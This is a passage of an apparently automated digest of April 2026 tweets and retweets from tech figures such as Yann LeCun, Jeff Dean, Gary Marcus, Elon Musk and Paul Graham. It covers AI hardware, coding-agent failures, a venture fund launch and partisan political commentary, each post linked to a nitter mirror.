Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://nitter.net/ylecun/status/2048399621492236615#m)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://nitter.net/PhillyInquirer/status/2048118689258487857#m)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://nitter.net/internetarchive/status/2048069805807128734#m)\n\n**[2026-04-24T20:50:37+00:00]**\n> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53…\n[原文链接](https://nitter.net/Strandjunker/status/2047780272297382384#m)\n\n**[2026-04-24T19:31:52+00:00]**\n> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what \"goo…\n[原文链接](https://nitter.net/ziv_ravid/status/2047760455679246500#m)\n\n**[2026-04-24T17:45:08+00:00]**\n> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in …\n[原文链接](https://nitter.net/internetarchive/status/2047733594064408894#m)\n\n**[2026-04-24T15:23:18+00:00]**\n> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能…\n[原文链接](https://nitter.net/AYi_AInotes/status/2047697898989572176#m)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://nitter.net/ihtesham2005/status/2047680485208531152#m)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://nitter.net/Discoplomacy/status/2047676640059154653#m)\n\n**[2026-04-24T11:19:36+00:00]**\n> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th…\n[原文链接](https://nitter.net/ylecun/status/2047636569767419951#m)\n\n**[2026-04-24T10:30:09+00:00]**\n> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI…\n[原文链接](https://nitter.net/ELLISforEurope/status/2047624126047670758#m)\n\n**[2026-04-24T06:38:08+00:00]**\n> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabi…\n[原文链接](https://nitter.net/cginisty/status/2047565736382534091#m)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://nitter.net/maddenifico/status/2047454244781818205#m)\n\n**[2026-04-23T18:12:46+00:00]**\n> RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️ Read for free or purchase in print ➡️ https://archive.org/details/vanishing-cultu…\n[原文链接](https://nitter.net/internetarchive/status/2047378161860776085#m)\n\n**[2026-04-23T14:27:57+00:00]**\n> RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear desi…\n[原文链接](https://nitter.net/Weinsteinlaw/status/2047321581966291154#m)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(12 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://nitter.net/JeffDean/status/2048759102390899142#m)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://nitter.net/TrackGazette/status/2048351736037826877#m)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://nitter.net/JeffDean/status/2047665074471387456#m)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://nitter.net/JeffDean/status/2047408945950802186#m)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://nitter.net/JeffDean/status/2047407537566495033#m)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://nitter.net/JeffDean/status/2047405389856297387#m)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://nitter.net/JeffDean/status/2047403921912873257#m)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://nitter.net/JeffDean/status/2047339995682529313#m)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://nitter.net/ceo_clickhouse/status/2046673188193701901#m)\n\n**[2026-04-21T17:02:26+00:00]**\n> RT by @JeffDean: The future of computer vision is agentic. 1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in st…\n[原文链接](https://nitter.net/nomadicai/status/2046635685206208533#m)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://nitter.net/NeurIPSConf/status/2046632664493384060#m)\n\n**[2026-04-20T21:46:52+00:00]**\n> RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudN…\n[原文链接](https://nitter.net/ThomasOrTK/status/2046344875994739028#m)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(4 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://nitter.net/soumithchintala/status/2048756358820827564#m)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://nitter.net/hardmaru/status/2047191747793649805#m)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://nitter.net/soumithchintala/status/2046282944139215141#m)\n\n**[2026-04-20T16:32:46+00:00]**\n> The Jensen + @dwarkesh_sp podcast was fantastic. Jensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense …\n[原文链接](https://nitter.net/soumithchintala/status/2046265830908870983#m)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(20 条)\n\n**[2026-04-27T15:50:31+00:00]**\n> If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say…\n[原文链接](https://nitter.net/GaryMarcus/status/2048791912149295182#m)\n\n**[2026-04-27T15:33:34+00:00]**\n> R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n[原文链接](https://nitter.net/GaryMarcus/status/2048787646206677207#m)\n\n**[2026-04-27T15:31:37+00:00]**\n> This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.\n[原文链接](https://nitter.net/GaryMarcus/status/2048787157536653627#m)\n\n**[2026-04-27T14:27:36+00:00]**\n> yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to end well.\n[原文链接](https://nitter.net/GaryMarcus/status/2048771044987777428#m)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://nitter.net/GaryMarcus/status/2048757233174122827#m)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://nitter.net/GaryMarcus/status/2048746152749846549#m)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://nitter.net/GaryMarcus/status/2048742983684784239#m)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://nitter.net/GaryMarcus/status/2048739005525877072#m)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://nitter.net/atmoio/status/2048608025464705084#m)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://nitter.net/GaryMarcus/status/2048593283639894520#m)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048589239915577837#m)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://nitter.net/suchenzang/status/2048582672163995766#m)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://nitter.net/FrankRundatz/status/2048579079121555764#m)\n\n**[2026-04-27T01:40:43+00:00]**\n> the difference is that we don’t *hype* giving 12 year-olds bulldozers. *of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point. …\n[原文链接](https://nitter.net/GaryMarcus/status/2048578055283880296#m)\n\n**[2026-04-27T01:09:02+00:00]**\n> RT by @GaryMarcus: Never ever use generative AI for anything critical. The technology is probablistic all the way down and therefore inherently unreliable. Why is this so hard to understand? It’s wil…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048570082843082905#m)\n\n**[2026-04-27T01:00:07+00:00]**\n> Generative AI as the Hindenberg\n[原文链接](https://nitter.net/GaryMarcus/status/2048567837221089669#m)\n\n**[2026-04-27T00:25:00+00:00]**\n> Is it me or X starting to look like a vibe coded mess? Polls are broken. Accounts are getting hacked. My DMs are full of phishing scams. Basics that used to work no longer work.\n[原文链接](https://nitter.net/GaryMarcus/status/2048558998325166498#m)\n\n**[2026-04-27T00:02:43+00:00]**\n> R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:\n[原文链接](https://nitter.net/GaryMarcus/status/2048553390540734479#m)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://nitter.net/GaryMarcus/status/2048552931923013916#m)\n\n---\n\n### ✅ @elonmusk — Elon Musk(18 条)\n\n**[2026-04-27T15:15:09+00:00]**\n> If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n[原文链接](https://nitter.net/elonmusk/status/2048783014075777369#m)\n\n**[2026-04-27T14:53:45+00:00]**\n> Excellent point\n[原文链接](https://nitter.net/elonmusk/status/2048777628019032335#m)\n\n**[2026-04-27T12:40:59+00:00]**\n> RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet. • Up to 3 Starlink antennas on each A380 for massive …\n[原文链接](https://nitter.net/cb_doge/status/2048744214230712500#m)\n\n**[2026-04-27T11:35:33+00:00]**\n> RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. OpenAI doesn’t “benefit all of humanity.”\n[原文链接](https://nitter.net/KatieMiller/status/2048727747954868342#m)\n\n**[2026-04-27T11:08:22+00:00]**\n> RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his p…\n[原文链接](https://nitter.net/jason_meister/status/2048720909809156378#m)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://nitter.net/elonmusk/status/2048600964102246438#m)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://nitter.net/elonmusk/status/2048589691054694406#m)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://nitter.net/elonmusk/status/2048543344746250466#m)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://nitter.net/elonmusk/status/2048535299102265720#m)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T17:27:34+00:00]**\n> RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California\n[原文链接](https://nitter.net/SpaceX/status/2048453949381091634#m)\n\n**[2026-04-26T17:05:40+00:00]**\n> RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?\n[原文链接](https://nitter.net/KonstantinKisin/status/2048448438715445382#m)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://nitter.net/RobertMSterling/status/2048435593244237849#m)\n\n**[2026-04-26T15:48:07+00:00]**\n> If they’re willing to die to assassinate, imagine what they will do if they gain political power\n[原文链接](https://nitter.net/elonmusk/status/2048428921536868583#m)\n\n**[2026-04-26T15:42:09+00:00]**\n> RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed\n[原文链接](https://nitter.net/SpaceX/status/2048427420366324024#m)\n\n**[2026-04-26T13:13:50+00:00]**\n> RT by @elonmusk: How do you think the left redistributes wealth? Violence How do you think the left seizes the means of production? Violence How do you think they censor and surveil opponents? Violen…\n[原文链接](https://nitter.net/TheAliceSmith/status/2048390094529216982#m)\n\n**[2026-04-26T05:24:02+00:00]**\n> Yeah\n[原文链接](https://nitter.net/elonmusk/status/2048271866914083172#m)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://nitter.net/paulg/status/2048704073356935676#m)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://nitter.net/paulg/status/2048701354672050286#m)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://nitter.net/paulg/status/2048677984106664227#m)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://nitter.net/jasonfreedman/status/2048615296613937201#m)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://nitter.net/DennisonBertram/status/2048413815675539816#m)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://nitter.net/paulg/status/2048413578789634100#m)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://nitter.net/paulg/status/2048411898081583547#m)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://nitter.net/paulg/status/2048411021329453562#m)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://nitter.net/haaretzcom/status/2048396013816152216#m)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://nitter.net/paulg/status/2048370801833828507#m)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://nitter.net/NickKristof/status/2048043843690561556#m)\n\n**[2026-04-25T13:02:57+00:00]**\n> Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.\n[原文链接](https://nitter.net/paulg/status/2048024967996993760#m)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://nitter.net/garrytan/status/2048017824895909901#m)\n\n**[2026-04-25T12:32:40+00:00]**\n> Whoah, self-driving cars compete with airlines. I never considered that till now.\n[原文链接](https://nitter.net/paulg/status/2048017345000415744#m)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://nitter.net/Ananyo/status/2047992864118894954#m)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://nitter.net/vaggelisdrak/status/2047957234664030380#m)\n\n**[2026-04-25T07:44:30+00:00]**\n> Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else. https://paulgraham.com/hamming.html\n[原文链接](https://nitter.net/paulg/status/2047944827887591681#m)\n\n**[2026-04-25T07:35:28+00:00]**\n> R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the…\n[原文链接](https://nitter.net/paulg/status/2047942555254288757#m)\n\n**[2026-04-25T07:30:15+00:00]**\n> The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you h…\n[原文链接](https://nitter.net/paulg/status/2047941243234107691#m)\n\n**[2026-04-24T19:36:00+00:00]**\n> RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT. In an attempt to influence American foreign policy, …\n[原文链接](https://nitter.net/unusual_whales/status/2047761493274571036#m)\n\n---\n\n### ✅ @naval — Naval Ravikant(11 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://nitter.net/alexbass/status/2047645157080658335#m)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://nitter.net/naval/status/2047550896670908809#m)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://nitter.net/avlok/status/2047546920747307466#m)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://nitter.net/naval/status/2047520212787015748#m)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://nitter.net/naval/status/2047519250433421604#m)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://nitter.net/naval/status/2047510419565420779#m)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://nitter.net/Cernovich/status/2047481012826124516#m)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://nitter.net/nivi/status/2047471220451578132#m)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://nitter.net/ankurnagpal/status/2047334901033123913#m)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://nitter.net/naval/status/2046991137022648800#m)\n\n**[2026-04-22T14:36:51+00:00]**\n> RT by @naval: Announcing my new thing: I'm launching a new public venture fund USVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future A…\n[原文链接](https://nitter.net/ankurnagpal/status/2046961436593713241#m)\n\n---\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-04-27T08:14:21+00:00]**\n> 😳\n[原文链接](https://nitter.net/pmarca/status/2048677114480873657#m)\n\n**[2026-04-27T08:07:29+00:00]**\n> cc @BrendanEich\n[原文链接](https://nitter.net/pmarca/status/2048675385119019444#m)\n\n**[2026-04-27T08:04:13+00:00]**\n> 👀\n[原文链接](https://nitter.net/pmarca/status/2048674564314685477#m)\n\n**[2026-04-27T08:01:44+00:00]**\n> But \"A Disservice To Those Who Are Watching\" is the name of this show!\n[原文链接](https://nitter.net/pmarca/status/2048673940072251670#m)\n\n**[2026-04-27T07:59:56+00:00]**\n> cc @elonmusk\n[原文链接](https://nitter.net/pmarca/status/2048673488383447437#m)\n\n**[2026-04-27T04:43:41+00:00]**\n> When one thing becomes abundant and cheap, another thing becomes scarce and valuable.\n[原文链接](https://nitter.net/pmarca/status/2048624098398650608#m)\n\n**[2026-04-27T04:32:43+00:00]**\n> Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"\n[原文链接](https://nitter.net/pmarca/status/2048621340408844368#m)\n\n**[2026-04-27T04:29:26+00:00]**\n> Image\n[原文链接](https://nitter.net/pmarca/status/2048620511912194339#m)\n\n**[2026-04-27T04:10:44+00:00]**\n> The apps can rewrite the files. 👀\n[原文链接](https://nitter.net/pmarca/status/2048615807190769738#m)\n\n**[2026-04-27T04:07:00+00:00]**\n> Many such cases.\n[原文链接](https://nitter.net/pmarca/status/2048614869352714619#m)\n\n**[2026-04-27T04:06:10+00:00]**\n> 🇺🇸\n[原文链接](https://nitter.net/pmarca/status/2048614659595583651#m)\n\n**[2026-04-27T04:04:46+00:00]**\n> Many such cases (in the universe).\n[原文链接](https://nitter.net/pmarca/status/2048614305705386433#m)\n\n**[2026-04-27T03:56:11+00:00]**\n> Concerning.\n[原文链接](https://nitter.net/pmarca/status/2048612144871264609#m)\n\n**[2026-04-27T03:49:14+00:00]**\n> Self recommending!\n[原文链接](https://nitter.net/pmarca/status/2048610397243265189#m)\n\n**[2026-04-27T03:01:18+00:00]**\n> Self recommending recommending.\n[原文链接](https://nitter.net/pmarca/status/2048598334492033455#m)\n\n**[2026-04-27T02:57:11+00:00]**\n> 👀\n[原文链接](https://nitter.net/pmarca/status/2048597298150875169#m)\n\n**[2026-04-27T02:34:50+00:00]**\n> 👀\n[原文链接](https://nitter.net/pmarca/status/2048591674688037210#m)\n\n**[2026-04-27T02:25:08+00:00]**\n> Overheard in Silicon Valley: \"Did a Claw post this?\"\n[原文链接](https://nitter.net/pmarca/status/2048589233095643240#m)\n\n**[2026-04-27T01:20:46+00:00]**\n> Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"\n[原文链接](https://nitter.net/pmarca/status/2048573035616375134#m)\n\n**[2026-04-26T21:32:43+00:00]**\n> Many such cases.\n[原文链接](https://nitter.net/pmarca/status/2048515643268567431#m)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(2 条)\n\n**[2026-04-22T18:05:41+00:00]**\n> \"Self-control is empathy with your future self.\" - Seinfeld\n[原文链接](https://nitter.net/morganhousel/status/2047013991046881663#m)\n\n**[2026-04-21T03:24:00+00:00]**\n> RT by @morganhousel: I’m in love with this sentence: “The best math you can learn is how to calculate the future cost of current decisions.”\n[原文链接](https://nitter.net/readswithravi/status/2046429717834654025#m)\n\n---\n\n### ✅ @eladgil — Elad Gil(20 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://nitter.net/eladgil/status/2048230781739581745#m)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://nitter.net/awnihannun/status/2047748613976264835#m)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://nitter.net/eladgil/status/2047489459378397604#m)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://nitter.net/adityaag/status/2047421448449630379#m)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial 